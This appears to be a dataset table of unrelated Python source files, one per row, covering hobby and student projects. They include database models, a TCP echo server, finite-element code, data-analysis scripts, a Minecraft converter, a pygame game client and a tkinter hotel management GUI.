text stringlengths 38 1.54M |
|---|
from sqlalchemy import func
from application import db
class Favorite(db.Model):
__tablename__ = "Favorite"
source_id = db.Column(db.Integer, db.ForeignKey("Profile.id"), nullable=False)
target_id = db.Column(db.Integer, db.ForeignKey("Profile.id"), nullable=False)
date_created = db.Column(db.DateTime, default=func.now(), server_default=func.now(), nullable=False)
__table_args__ = (db.PrimaryKeyConstraint("source_id", "target_id"),
db.CheckConstraint("source_id != target_id"),) # Can't favorite oneself.
def __init__(self, source_id, target_id):
self.source_id = source_id
self.target_id = target_id
|
#!/usr/bin/python
import socket
host = ''
port = 18000
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.bind((host,port))
s.listen(2)
conn,addr = s.accept()
print 'Got connection from:',addr
while 1:
data = conn.recv(4096)
if not data:break
conn.sendall(data)
conn.close()
|
"""
Provides the data structure for the degrees of freedom manager.
"""
# IMPORTS
import numpy as np
from scipy import sparse
# DEBUGGING
from IPython import embed as IPS
class DOFManager(object):
"""
Connects the finite element mesh and reference element
through the assignment of degrees of freedom to individual elements.
Parameters
----------
mesh : pysofe.meshes.Mesh
The mesh for which to provide connectivity information
element : pysofe.elements.base.Element
The reference element
"""
def __init__(self, mesh, element):
# consistency check
if not mesh.dimension == element.dimension:
msg = "Dimension mismatch between mesh and reference element! ({}/{})"
raise ValueError(msg.format(mesh.dimension, element.dimension))
elif not mesh.ref_map._shape_elem.n_verts == element.n_verts:
msg = "Incompatible shapes between mesh and reference element!"
raise ValueError(msg)
self._mesh = mesh
self._element = element
@property
def mesh(self):
return self._mesh
@property
def element(self):
return self._element
@property
def n_dof(self):
"""
The total number of degrees of freedom
"""
n_dof = np.abs(self.get_dof_map(d=self._mesh.dimension)).max()
return n_dof
def get_dof_map(self, d, mask=None):
"""
Returns the degrees of freedom mapping that connects the global mesh
entities of topological dimension `d` to the local reference element.
Parameters
----------
d : int
The topological dimension of the entities for which to return
the degrees of freedom mapping
mask : array_like
An 1d array marking certain entities of which to get the dof map
"""
dof_map = self._compute_connectivity_array()[d]
if mask is not None:
mask = np.asarray(mask)
assert mask.ndim == 1
if mask.dtype == bool:
dof_map = dof_map.compress(mask, axis=1)
elif mask.dtype == int:
dof_map = dof_map.take(mask, axis=1)
else:
raise TypeError("Invalid type of mask! ({})".format(mask.dtype))
return dof_map
def extract_dofs(self, d, mask=None):
"""
Returns a boolean array specifying the degrees of freedom
associated with the mesh entities of topological dimension `d`.
Parameters
----------
d : int
The topological dimension of the mesh entities
mask : array_like
An 1d array marking certain entities of which to get the dofs
"""
# first we need the dof map
dof_map = self.get_dof_map(d, mask)
n_dof = self.n_dof
# remove duplicates and dofs mapped to `0`
dofs = np.unique(dof_map)
dofs = np.setdiff1d(dofs, 0)
# build array using coo sparse matrix capabilities
col_ind = dofs - 1
row_ind = np.zeros_like(col_ind)
data = np.ones_like(col_ind, dtype=bool)
dofs = sparse.coo_matrix((data, (row_ind, col_ind)), shape=(1, n_dof))
# turn it into an 1d array
dofs = dofs.toarray().ravel()
return dofs
def _compute_connectivity_array(self):
"""
Establishes the connection between the local and global degrees of freedom
via the connectivity array `C` where `C[i,j] = k` connects the `i`-th
global basis function on the `j`-th element to the `k`-th local basis
function on the reference element.
"""
# the assignement of the degrees of freedom from 1 to the total number
# of dofs will be done according to the following order:
# 1.) components (scalar- or vector-valued)
# 2.) entities
# 3.) topological dimension (vertices, edges, cells)
# first the assignment of new dofs
#----------------------------------
global_dim = self.mesh.dimension
# init n_dofs and a list that will hold the dof indices
# that will be assigned to the entities of each topological
# dimension
n_dofs = 0
dofs = [None] * (global_dim + 1)
# iterate through all topological dimensions and generate
# the needed dof indices
for topo_dim in xrange(global_dim + 1):
# first we need the number of entities of the current
# topological dimension
n_entities = self.mesh.topology.n_entities[topo_dim]
# the entry in the dof tuple specifies how many dofs are
# associated with one entity of the current topological dimension
dofs_needed = self.element.dof_tuple[topo_dim] * n_entities
# generate the new dof indices starting with the current
# number of dofs generated
new_dofs = n_dofs + 1 + np.arange(dofs_needed, dtype=int)
# reshape them such that the dofs that correspond to one
# entity are contained in the corresponding column
dofs[topo_dim] = new_dofs.reshape((-1, n_entities))
# raise the number of generated dofs
n_dofs += dofs_needed
# the dof index arrays listed in `dofs` now contain column-wise
# the dof indices for each entity of the corresponding topological
# dimension
# assemble dof maps
#-------------------
# init list that will hold the connectivity arrays
# for each topological dimension
dof_map = [None] * (global_dim + 1)
# iterate through the topological dimensions
# and assemble the dof map for the associated entities
for entity_dim in xrange(global_dim + 1):
# init a template for the dof map of the
# currently considered entities
temp = [None] * (entity_dim + 1)
# iterate over all sub-entities (using their dimension)
# of the currently considered entities and
# add the corresponding dof indices from the
# dof index array to the template
for sub_dim in xrange(entity_dim + 1):
# first we need to get the incidence relation
# `entity_dim -> sub_dim`
if sub_dim < entity_dim:
incidence = self.mesh.topology.get_connectivity(d=entity_dim,
dd=sub_dim,
return_indices=True)
n_entities = incidence.shape[0]
else:
assert sub_dim == entity_dim
n_entities = self.mesh.topology.n_entities[entity_dim]
incidence = 1 + np.arange(n_entities, dtype=int)[:,None]
# now we take the corresponding dof indices
# and add them to the template
sub_dim_dofs = dofs[sub_dim].take(incidence.T - 1, axis=1)
temp[sub_dim] = np.reshape(sub_dim_dofs, newshape=(-1, n_entities))
dof_map[entity_dim] = np.vstack(temp)
return dof_map
|
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 29 09:57:02 2016
@author: juliette
"""
from IPython.display import display
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from utils_preprocessing import date_format, date_to_str, fill_holidays, date_to_str_2
from challenge_constants import *
from datetime import datetime as dt
import datetime
import pickle
# %%
df = pd.read_csv("data/train_2011_2012_2013.csv", sep=';')
#df.to_pickle("data/train.pkl")
#df = pd.read_pickle("data/train.pkl")
# %% nan
df['ASS_COMENT'] = df['ASS_COMENT'].fillna(0)
df['ASS_COMENT'] = df['ASS_COMENT'].replace('Rattachement au Pôle Grand Compte', 1)
# %% dates
df = date_to_str(df, ['DATE'])
df = date_format(df, ['DATE'])
# %% holidays
df = fill_holidays(df)
# %% categorical columns
l = ['TPER_TEAM', 'SPLIT_COD', 'ASS_ASSIGNMENT', 'ASS_DIRECTORSHIP', 'ASS_PARTNER', 'ASS_POLE', 'ASS_SOC_MERE',
'DAY_WE_DS']
for col in l:
df[col] = df[col].astype('category')
# %% useless columns
columns_to_drop = ["ACD_COD", "ACD_LIB", "CSPL_INCOMPLETE"]
df = df.drop(columns_to_drop, axis=1)
# %% test data
lines = open("data/submission.txt", "r", encoding="utf-8").readlines()
dates = []
assignments = []
d = dict.fromkeys(['DATE', 'DATE_FORMAT', 'ASS_ASSIGNMENT'])
for line in lines[1:]:
row = line.split("\t")
dates.append(row[0])
assignments.append(row[1])
d['DATE'] = dates
d['DATE_FORMAT'] = dates
d['ASS_ASSIGNMENT'] = assignments
df_test = pd.DataFrame(data=d)
df_test = date_to_str(df_test, ['DATE_FORMAT'])
df_test = date_format(df_test, ['DATE_FORMAT'])
# %% Keeping only necessary columns for this analysis
df_small = df[['ASS_ASSIGNMENT','TPER_HOUR','DAY_WE_DS','CSPL_RECEIVED_CALLS', 'DATE']]
df_small['TIME_SLOT'] = df_small['DATE'].apply(lambda date: str(date.hour)+str(date.minute))
df_small['YEAR'] = df_small['DATE'].apply(lambda date: date.year)
# %% date formatting
dayOfWeek = ['Lundi',
'Mardi',
'Mercredi',
'Jeudi',
'Vendredi',
'Samedi',
'Dimanche']
df_test['DAY_WE_DS'] = df_test['DATE_FORMAT'].apply(lambda date: dayOfWeek[date.weekday()])
df_test['TPER_HOUR'] = df_test['DATE_FORMAT'].apply(lambda date: date.hour)
df_test['TIME_SLOT'] = df_test['DATE_FORMAT'].apply(lambda date: str(date.hour)+str(date.minute))
print(df_test['DAY_WE_DS'])
print(df_test['TPER_HOUR'])
print(df_test['TIME_SLOT'])
# %% Means grouped by department, hour and day of the week
NUMBER_DAYS = 3*365/(2*7)
means_df = pd.DataFrame({"mean":df_small.groupby(['ASS_ASSIGNMENT', 'DAY_WE_DS', 'TIME_SLOT'])
['CSPL_RECEIVED_CALLS'].sum()}).reset_index()
means_df['mean'] = means_df['mean'] / NUMBER_DAYS
# %%
df_merge= pd.merge(df_test, means_df,on=['ASS_ASSIGNMENT','TIME_SLOT', 'DAY_WE_DS'], how='inner')
# %%
def compute_score(y_true, y_predict, alpha=0.1):
return np.average(np.exp(alpha * (y_true - y_predict)) - alpha * (y_true - y_predict) - np.ones(len(y_predict)))
# %%
#df_merge['prediction'] = df_merge['mean'].apply(lambda x: int(np.ceil(2 * float(x))))
df_merge['prediction'] = df_merge['mean']
d_sub = df_merge[['DATE', 'ASS_ASSIGNMENT', 'prediction']]
d_sub.to_csv('data/test_submission.csv', sep="\t", encoding='utf-8', index=False)
# %%
print(df_merge.max()) |
# -*- coding: utf-8 -*-
import MySQLdb
star_info_list = [
'name',
'english_name',
'profession',
'zodiac',
'gender',
'height',
'weight',
'blood_group',
'birthday',
'birthplace',
'relationship',
'biography',
]
class Star(object):
def __init__(self):
self.info = {}
self.name = None
self.english_name = None
self.profession = None
self.zodiac = None
self.gender = 'male'
self.height = None
self.weight = None
self.blood_group = None
self.birthday = None
self.birthplace = None
self.biography = None
self.relationship = None
def update_info(self):
self.info.update({'name': self.name})
self.info.update({'english_name': self.english_name})
self.info.update({'profession': self.profession})
self.info.update({'zodiac': self.zodiac})
self.info.update({'gender': self.gender})
self.info.update({'height': self.height})
self.info.update({'weight': self.weight})
self.info.update({'blood_group': self.blood_group})
self.info.update({'birthday': self.birthday})
self.info.update({'birthplace': self.birthday})
self.info.update({'biography': self.biography})
self.info.update({'relationship': self.relationship})
def save_star_info(self, connection_wrapper):
info_list = []
for key in star_info_list:
item = self.info[key]
if item is None:
item = 'null'
elif isinstance(item, unicode):
item = '"{}"'.format(MySQLdb.escape_string(item.encode('utf8')))
elif isinstance(item, str):
item = '"{}"'.format(MySQLdb.escape_string(item))
info_list.append(item)
connection_wrapper.insert_row(info_list)
|
import json
import directories
from WorldConverter.itemMapping.convert import convertItem
blockEntityToIntermediate = json.load(open(directories.getFiltersDir()+'/WorldConverter/tileEntityMapping/_intermediate.json'))
blockEntityFromIntermediate = {}
blockEntityFromIntermediate['PC'] = json.load(open(directories.getFiltersDir()+'/WorldConverter/tileEntityMapping/intermediate_java.json'))
blockEntityFromIntermediate['PE'] = json.load(open(directories.getFiltersDir()+'/WorldConverter/tileEntityMapping/intermediate_bedrock.json'))
from pymclevel import TAG_List, TAG_Byte, TAG_Int, TAG_Compound, TAG_Short, TAG_Double, TAG_String, TAG_Float
def convertBlockEntity(convertFrom, convertTo, te):
if convertFrom == convertTo:
return
if 'id' not in te:
del te
if te['id'].value not in blockEntityToIntermediate:
raise Exception('{} is not a known block entity name'.format(te['id'].value))
intermediateID = blockEntityToIntermediate[te['id'].value]
# conversion code here
# something recursive would probably be required in the long term
if intermediateID == 'minecraft:flower_pot':
if convertFrom == 'PC':
if 'Item' in te:
itemID = te['Item'].value
del te['Item']
else:
itemID = 'minecraft:air'
# raise Exception('Item definition not in te:{}'.format(te))
if 'Data' in te:
itemData = te['Data'].value
del te['Data']
else:
itemData = 0
elif convertFrom == 'PE':
if 'item' in te:
itemID = te['item'].value
del te['item']
else:
itemID = 0
# raise Exception('Item definition not in te:{}'.format(te))
if 'mData' in te:
itemData = te['mData'].value
del te['mData']
else:
itemData = 0
itemIDNew, itemDataNew = convertItem(convertFrom, convertTo, itemID, itemData)
if convertTo == 'PC':
te['Item'] = TAG_String(itemIDNew)
te['Item'] = TAG_Int(itemDataNew)
elif convertTo == 'PE':
te['item'] = TAG_Short(itemIDNew)
te['mData'] = TAG_Int(itemDataNew)
elif intermediateID == 'minecraft:bed':
if convertFrom in ['PC', 'PE']:
if 'color' in te:
colour = te['color'].value
del te['color']
else:
colour = 14
if convertTo == 'PC':
te['color'] = TAG_Int(colour)
elif convertTo == 'PE':
te['color'] = TAG_Byte(colour)
# elif intermediateID == 'minecraft:chest':
# if PC
# change things unique to a chest
# change inventory
# convertInventory(convertFrom, convertTo, te)
if intermediateID not in blockEntityFromIntermediate[convertTo]:
raise Exception('{} is not a known block entity name'.format(te['id'].value))
if blockEntityFromIntermediate[convertTo][intermediateID] is None:
del te
else:
te['id'] = TAG_String(blockEntityFromIntermediate[convertTo][intermediateID])
# def convertInventory(convertFrom, convertTo, te):
# if PC
# copy tag to the correct location and convert item using the item mappings
# convertItem(...)
# if PE |
def CI(P, R, T):
i=1
while i<=T:
result = (P*R*1)/100
P = P + result
i+=1
print("CI = ", P)
print("Here is a program to find out the COMPOUND INTEREST :-\n")
P = float(input("Enter the Starting amount : ₹"))
R = float(input("Enter Rate : "))
T = int(input("Enter time in Year : "))
CI(P, R, T)
|
import sys
data = []
money = 100
shares = 0
for line in sys.stdin:
data.append(int(line))
prices = data[1:]
turningpoints = [0]
if len(prices) == 1:
money = 100
else:
if prices[0] < prices[1]:
shares = int(money/prices[0])
money -= shares*prices[0]
for i in range(1,len(prices)-1):
if prices[turningpoints[i-1]] < prices[i] and prices[i] > prices[i+1]:
money += prices[i]*shares
shares = 0
turningpoints.append(i)
elif prices[turningpoints[i-1]] > prices[i] and prices[i] < prices[i+1]:
shares = int(money/prices[i])
if shares > 100000:
shares = 100000
money -= shares*prices[i]
turningpoints.append(i)
else:
turningpoints.append(turningpoints[-1])
money += shares*prices[-1]
print(int(money))
|
# chapter 3
# Import package
# Definition of radius
r = 0.43
# Import the math package
import math
from math import radians
# Calculate C
C = 2*math.pi*r
Crad = radians(360)*r
# Calculate A
A = math.pi*r**2
Arad = radians(180)*r**2
# Build printout
print("Circumference: " + str(C))
print("Circumference using radians: " + str(Crad))
print("Area: " + str(A))
print("Area using radians: " + str(Arad))
|
# -*- coding: utf-8 -*-
import sys
import datetime
import os
import pygame
import pygame.locals
import time
import dMVC.remoteclient
import ocempgui.widgets
import GG.isoview.login
import GG.utils
import GG.isoview.guiobjects
#Constants
VERSION = "0.17.1-3"
VERSION_TITLE = "GenteGuada "+VERSION
CLEAR_CACHE_WEEKS = 4
LOADING_BACKGROUND = os.path.join(GG.utils.INIT_IMAGE_PATH, "loadingGG.png")
LOADING_BACKGROUND_POSITION = [0, 0]
LOADING_LABEL = "Cargando..."
LOADING_LABEL_POSITION = [350, 300]
WAITING_LABEL_POSITION = [314, 335]
UPLOAD_MASK = os.path.join(GG.utils.PATH_PHOTO_MASK,"imgUpload.png")
ERROR_CONNECTION = "No hay conexion con el servidor"
FPS = 30
ICON = os.path.join(GG.utils.INIT_IMAGE_PATH, "icon64.png")
class GenteGuada:
""" GenteGuada class.
This is the program's main class. It starts all services and runs the game.
"""
def __init__(self):
""" Class constructor.
"""
self.__screen = None
self.__system = None
self.__isoHud = None
self.__session = None
self.__client = None
self.__fullScreen = None
self.__avatarDownloadImages = []
self.__exitCondition = None
self.__singleMode = False
self.__clearCache()
self.avatarConfigurationData = None
GenteGuada.instance = self
@staticmethod
def getInstance():
""" Returns this class's instance.
"""
return GenteGuada.instance
def getSession(self):
""" Returns the active session object.
"""
return self.__session
def __input(self, events):
""" Handles the keyboard and window input events.
"""
for event in events:
if event.type == pygame.locals.QUIT:
self.finish()
if event.type == pygame.locals.KEYDOWN:
if event.key == pygame.locals.K_ESCAPE:
self.finish()
def finish(self):
""" Closes the program and all its services.
"""
if self.__session:
self.__session.getPlayer().setState(GG.utils.STATE[1])
if self.__exitCondition is None:
sys.exit(0)
self.__isoHud.getModel().unsubscribeEvents()
self.__isoHud.getIVRoom().getModel().exitPlayer(self.__isoHud.getPlayer())
self.__isoHud.unsubscribeAllEvents()
pygame.mixer.music.stop()
self.__exitCondition = True
def __connectScreen(self):
""" Loads the "loading screen".
"""
widgetContainer = ocempgui.widgets.Renderer()
widgetContainer.set_screen(self.__screen)
window = ocempgui.widgets.Box(GG.utils.SCREEN_SZ[0], GG.utils.SCREEN_SZ[1])
imgPath = LOADING_BACKGROUND
imgBackgroundRight = GG.isoview.guiobjects.OcempImageMapTransparent(imgPath)
imgBackgroundRight.topleft = LOADING_BACKGROUND_POSITION
window.add_child(imgBackgroundRight)
loadingLabel = GG.isoview.guiobjects.OcempLabel("Conectando ...", GG.isoview.guiobjects.STYLES["labelWaiting"])
loadingLabel.topleft = WAITING_LABEL_POSITION
window.add_child(loadingLabel)
widgetContainer.add_widget(window)
def __loadingScreen(self):
""" Loads the "loading screen".
"""
widgetContainer = ocempgui.widgets.Renderer()
widgetContainer.set_screen(self.__screen)
window = ocempgui.widgets.Box(GG.utils.SCREEN_SZ[0], GG.utils.SCREEN_SZ[1])
imgPath = LOADING_BACKGROUND
imgBackgroundRight = GG.isoview.guiobjects.OcempImageMapTransparent(imgPath)
imgBackgroundRight.topleft = LOADING_BACKGROUND_POSITION
window.add_child(imgBackgroundRight)
loadingLabel = GG.isoview.guiobjects.OcempLabel(LOADING_LABEL, GG.isoview.guiobjects.STYLES["labelLoading"])
loadingLabel.topleft = LOADING_LABEL_POSITION
window.add_child(loadingLabel)
widgetContainer.add_widget(window)
def __waitScreen(self):
""" Loads the "waiting screen".
"""
widgetContainer = ocempgui.widgets.Renderer()
widgetContainer.set_screen(self.__screen)
window = ocempgui.widgets.Box(GG.utils.SCREEN_SZ[0], GG.utils.SCREEN_SZ[1])
imgPath = self.getDataPath(LOADING_BACKGROUND)
imgBackgroundRight = GG.isoview.guiobjects.OcempImageMapTransparent(imgPath)
imgBackgroundRight.topleft = LOADING_BACKGROUND_POSITION
window.add_child(imgBackgroundRight)
loadingLabel = GG.isoview.guiobjects.OcempLabel("Salas ocupadas. Espere...", GG.isoview.guiobjects.STYLES["labelWaiting"])
loadingLabel.topleft = WAITING_LABEL_POSITION
window.add_child(loadingLabel)
widgetContainer.add_widget(window)
def start(self, params):
""" Creates all necessary objects and initializes attributes.
params: application start parameters.
"""
pygame.init()
pygame.display.set_caption(VERSION_TITLE)
icon = pygame.image.load(ICON)
pygame.display.set_icon(icon)
self.__screen = pygame.display.set_mode(GG.utils.SCREEN_SZ, pygame.HWSURFACE | pygame.DOUBLEBUF, 0)
if params.fullscreen:
pygame.display.toggle_fullscreen()
self.__fullScreen = params.fullscreen
self.__connectScreen()
self.__setSystem(params.ip, params.port)
if self.__system is None:
errorConnection = GG.isoview.login.ErrorConnection(self.__screen, self)
errorConnection.draw()
self.__loadingScreen()
winLogin = GG.isoview.login.Login(self.__screen, self)
self.__session = winLogin.draw()
#self.__session = winLogin.draw(params.user, params.password)
self.__loadingScreen()
user = self.__session.getPlayer()
#userAdmin = False
if user.admin:
# userAdmin = winLogin.drawAccessMode()
# user.setAccessMode(userAdmin)
user.setAccessMode(True)
self.__loadingScreen()
#self.__initGame(user, userAdmin)
self.__initGame(user)
def getSystem(self):
""" Returns the system object.
"""
return self.__system
def __setSystem(self, ipAddress, port):
""" Loads a new system object from a remote location.
ipAddress: remote location ip address.
port: remote location port.
"""
if ipAddress:
try:
self.__client = dMVC.remoteclient.RClient(ipAddress, port = port, autoEvents=False)
except Exception, excep:
print excep, ERROR_CONNECTION
if self.__client is not None:
self.__system = self.__client.getRootModel()
if not self.validateVersion(self.__client.getVersion()):
import GG.isoview.login
errorVersion = GG.isoview.login.ErrorVersion(self.__screen, self)
errorVersion.draw()
else:
import GG.model.ggsystem
self.__singleMode = True
self.__system = GG.model.ggsystem.GGSystem()
def validateVersion(self, version):
if version in [VERSION,"0.17.1-1"]:
return True
return False
#def __initGame(self, user, accesMode):
def __initGame(self, user):
""" Initializes all start parameters and runs the game's main process.
"""
#self.__isoHud = self.__session.defaultView(self.__screen, self.__fullScreen, user, accesMode)
self.__isoHud = self.__session.defaultView(self.__screen, self.__fullScreen, user)
self.__screen.fill([0, 0, 0])
self.__isoHud.draw()
isohud = self.__isoHud
intentedFPS = 30
frameCounter = 0
theClock = pygame.time.Clock()
theClock_tick = theClock.tick
get_ticks = pygame.time.get_ticks
pygame_event_get = pygame.event.get
time_sleep = time.sleep
if self.__client:
client_processEvents = self.__client.processEvents
else:
client_processEvents = lambda : None # Do nothing!
last = get_ticks()
self.__exitCondition = False
while not self.__exitCondition:
time_sleep(0.01) # Minor sleep to give opportunity to another thread to execute
theClock_tick(FPS)
client_processEvents()
now = get_ticks()
self.checkUploadFileMaskFinish()
isohud.updateFrame(pygame_event_get(), now)
self.__exitCondition = None
pygame.quit()
def getDataPath(self, img):
""" Returns the data path for an item image, being local or remote.
"""
if self.__singleMode:
return os.path.join(GG.utils.DATA_PATH, img)
else:
pathFile = os.path.join(GG.utils.LOCAL_DATA_PATH, img)
if not os.path.isfile(pathFile):
imgData = self.__system.getResource(img)
if imgData:
if not os.path.isdir(os.path.dirname(pathFile)):
GG.utils.createRecursiveDir(os.path.dirname(pathFile))
imgFile = open(pathFile, "wb")
imgFile.write(imgData)
imgFile.close()
else:
return GG.utils.IMG_ERROR
return pathFile
def getListDataPath(self, imgList):
""" Returns the data path for an item image list.
imgList: image list.
"""
result = []
for imgName in imgList:
result.append(self.getDataPath(imgName))
return result
def __clearCache(self):
""" Clears the local cache folder.
"""
now = datetime.datetime.today()
limitDate = now - datetime.timedelta(weeks=CLEAR_CACHE_WEEKS)
limitTime = time.mktime(limitDate.timetuple())
GG.utils.clearCache(GG.utils.LOCAL_DATA_PATH, limitTime)
def uploadFile(self, upFile, dirDest=None):
""" Uploads a new file and copies it.
upFile: uploaded file.
dirDest: file copy location.
"""
if not os.path.isfile(upFile):
return None
filepath, fileName = os.path.split(upFile)
name, ext = os.path.splitext(fileName)
try:
uploadedFile = open(file , "rb")
dataFile = uploadedFile.read()
uploadedFile.close()
except:
return None
return self.__system.uploadFile([name, ext], dataFile, dirDest)
def asyncUploadFile(self, upFile, finishMethod, dirDest = None):
""" Uploads a new file on asynchronous mode and copies it.
upFile: uploaded file.
finishMethod: method executed on upload end.
dirDest: file copy location.
"""
if not os.path.isfile(upFile):
finishMethod(None)
return
filepath, fileName = os.path.split(upFile)
name, ext = os.path.splitext(fileName)
try:
uploadedFile = open(upFile , "rb")
dataFile = uploadedFile.read()
uploadedFile.close()
except:
finishMethod(None)
return
self.__system.async(self.__system.uploadFile, finishMethod, [name, ext], dataFile, dirDest)
def checkUploadFileMaskFinish(self):
if self.avatarConfigurationData:
if self.avatarConfigurationData["mask"]:
self.__system.changeAvatarConfiguration(self.avatarConfigurationData["configuracion"], self.avatarConfigurationData["player"], self.avatarConfigurationData["mask"])
self.avatarConfigurationData = None
def uploadAvatarConfiguration(self, configuration, player):
""" Uploads an avatar configuration.
configuration: avatar configuration data.
player: avatar's owner.
"""
if configuration["mask"]:
self.avatarConfigurationData = {}
self.avatarConfigurationData["configuracion"] = configuration
self.avatarConfigurationData["player"] = player
self.avatarConfigurationData["mask"] = None
self.asyncUploadFile(UPLOAD_MASK, self.uploadMaskFileFinish)
else:
self.__system.changeAvatarConfiguration(configuration, player, None)
def uploadMaskFileFinish(self, resultado):
""" Changes the avatar's mask after upload is finished.
resultado: upload result.
"""
if resultado:
self.avatarConfigurationData["mask"] = resultado
def getRoom(self, label):
""" Returns an specific room.
label: room's label.
"""
return self.__system.getRoom(label)
def createRoom(self, label, size, image, maxUsers, enabled, startRoom, copyRoom=None):
""" Creates a new room.
label: room label.
size: room size.
image: sprite used to paint the room floor.
maxUsers: max users per room.
enabled: enabled room flag.
starterRoom: sets this room as starter or not.
copyRoom: room to be copied.
"""
return self.__system.createRoom(image, label, size, maxUsers, enabled, startRoom, copyRoom)
def deleteRoom(self, label):
""" Deletes a room from the system.
label: room's label.
"""
return self.__system.deleteRoom(label)
def getAvatarImages(self, avatar):
""" Creates avatar images.
avatar: curren player's avatar.
"""
if not avatar.username in self.__avatarDownloadImages:
self.__avatarDownloadImages.append(avatar.username)
self.__system.async(self.__system.getAvatarImages, self.getAvatarImagesFinish, avatar)
def getAvatarImagesFinish(self, resultado):
""" Saves all created avatar images.
resultado: avatar images creation result.
"""
path = resultado["path"]
if not os.path.isdir(os.path.join(GG.utils.LOCAL_DATA_PATH, path)):
GG.utils.createRecursiveDir(os.path.join(GG.utils.LOCAL_DATA_PATH, path))
for key in resultado.keys():
if not key in ["path", "avatar", "timestamp"]:
avatarImage = open(os.path.join(GG.utils.LOCAL_DATA_PATH, path, key), "wb")
avatarImage.write(resultado[key])
avatarImage.close()
self.__isoHud.changeAvatarImages(resultado["avatar"], resultado["path"], resultado["timestamp"])
if resultado["avatar"].username in self.__avatarDownloadImages:
self.__avatarDownloadImages.remove(resultado["avatar"].username)
def isSingleMode(self):
""" Checks wether the game is in sigle player mode or multiplayer mode.
"""
return self.__singleMode
def isAvatarDownload(self, avatar):
return avatar.username in self.__avatarDownloadImages
def sendError(self):
if os.path.isfile("error.txt"):
fileError = open("error.txt","r")
errorData = fileError.read()
fileError.close()
send = self.__system.sendError(errorData)
if send:
os.remove("error.txt")
|
def convert_to_scream(text):
# A scream is all-caps and ends with an exclamation mark
return text.upper() + '!'
message = input('Wat wil je schreeuwen?: ')
loud_message = convert_to_scream(message)
print(loud_message)
|
# 5
# X S X X T
# T X S X X
# X X X X X
# X T X X X
# X X T X X
# https://www.acmicpc.net/problem/18428
from itertools import combinations
def dfs(teacher, room, d):
x, y = teacher
for i in range(4):
if i != d:
continue
nx = x + dx[i]
ny = y + dy[i]
if not (0 <= nx < n and 0 <= ny < n):
return
if room[nx][ny] == 'X':
dfs((nx, ny), room, i)
elif room[nx][ny] == 'S':
room[nx][ny] = 'W'
dfs((nx, ny), room, i)
elif room[nx][ny] == 'T':
return
else:
return
n = int(input())
room = [list(input().split()) for _ in range(n)]
blank_pos = []
teacher_pos = []
student_pos = []
for i in range(n):
for j in range(n):
if room[i][j] == 'X':
blank_pos.append((i, j))
elif room[i][j] == 'S':
student_pos.append((i, j))
else:
teacher_pos.append((i, j))
dx = [-1, 1, 0, 0]
dy = [0, 0, -1, 1]
sw = False
for blank in combinations(blank_pos, 3):
tmp = [[0] * n for _ in range(n)]
for b in blank_pos:
x, y = b
tmp[x][y] = 'X'
for o in blank:
x, y = o
tmp[x][y] = 'O'
for t in teacher_pos:
x, y = t
tmp[x][y] = 'T'
for s in student_pos:
x, y = s
tmp[x][y] = 'S'
for teacher in teacher_pos:
for i in range(4):
dfs(teacher, tmp, i)
# for a in range(n):
# for b in range(n):
# print(tmp[a][b], end=' ')
# print()
# print()
aaa = []
for student in student_pos:
x, y = student
if tmp[x][y] == 'W':
aaa.append('W')
#print('aaa', aaa)
if not aaa:
sw = True
break
if sw:
print('YES')
else:
print('NO') |
from tkinter import*
from PIL import Image, ImageTk
from customer import Customer_Window
class Hotel_Management_System:
def __init__(self, root):
self.root = root
self.root.title("Hotel Management System")
self.root.geometry("1920x1080+0+0")
# --------Header Image-------
img1 = Image.open(r"S:\projects\GUI based Hotel Management System Using Database in MySQL\Images\header1.jpg")
img1 = img1.resize((1920,140),Image.ANTIALIAS)
self.photoimg1 = ImageTk.PhotoImage(img1)
lbling = Label(self.root, image=self.photoimg1, relief=RIDGE)
lbling.place(x=0, y=0, width=1920, height=140)
# ---------Main Frame-----------
main_frame = Frame(self.root, bd=4, relief=RIDGE)
main_frame.place(x=0, y=140, width=1920, height=908)
# -----------Navigation Menu-------------
lbl_menu = Label(main_frame, text="Menu", font=("times new roman", 20, "bold"), bg="lightblue", fg="white", bd=1, relief=RIDGE)
lbl_menu.place(x=0, y=0, width=230)
# ---------Button Frame-----------
btn_frame = Frame(main_frame, bd=0, relief=RIDGE)
btn_frame.place(x=0, y=35, width=230, height=180)
customer_btn = Button(btn_frame, text="Customer", command=self.customer_details, width=22, font=("times new roman", 14, "bold"), bg="lightblue", fg="white", bd=0, cursor="hand2")
customer_btn.grid(row=0, column=0, pady=1)
room_btn = Button(btn_frame, text="Room", width=22, font=("times new roman", 14, "bold"), bg="lightblue", fg="white", bd=0, cursor="hand2")
room_btn.grid(row=1, column=0, pady=1)
details_btn = Button(btn_frame, text="Details", width=22, font=("times new roman", 14, "bold"), bg="lightblue", fg="white", bd=0, cursor="hand2")
details_btn.grid(row=2, column=0, pady=1)
report_btn = Button(btn_frame, text="Report", width=22, font=("times new roman", 14, "bold"), bg="lightblue", fg="white", bd=0, cursor="hand2")
report_btn.grid(row=3, column=0, pady=1)
logout_btn = Button(btn_frame, text="LogOut", width=22, font=("times new roman", 14, "bold"), bg="lightblue", fg="white", bd=0, cursor="hand2")
logout_btn.grid(row=4, column=0, pady=1)
# ---------Main Body Image-----------
img3 = Image.open(r"S:\projects\GUI based Hotel Management System Using Database in MySQL\Images\body1.jpg")
img3 = img3.resize((1670,900),Image.ANTIALIAS)
self.photoimg3 = ImageTk.PhotoImage(img3)
lbling1 = Label(main_frame, image=self.photoimg3, bd=0, relief=RIDGE)
lbling1.place(x=235, y=0, width=1670, height=900)
# -----------Navigation Images--------
img4 = Image.open(r"S:\projects\GUI based Hotel Management System Using Database in MySQL\Images\restaurant.jpg")
img4 = img4.resize((230,210),Image.ANTIALIAS)
self.photoimg4 = ImageTk.PhotoImage(img4)
lbling2 = Label(main_frame, image=self.photoimg4, bd=0, relief=RIDGE)
lbling2.place(x=0, y=225, width=230, height=210)
img5 = Image.open(r"S:\projects\GUI based Hotel Management System Using Database in MySQL\Images\swimimgpool.jpg")
img5 = img5.resize((230,190),Image.ANTIALIAS)
self.photoimg5 = ImageTk.PhotoImage(img5)
lbling3 = Label(main_frame, image=self.photoimg5, bd=0, relief=RIDGE)
lbling3.place(x=0, y=440, width=230, height=190)
img6 = Image.open(r"S:\projects\GUI based Hotel Management System Using Database in MySQL\Images\room.jpg")
img6 = img6.resize((230,190),Image.ANTIALIAS)
self.photoimg6 = ImageTk.PhotoImage(img6)
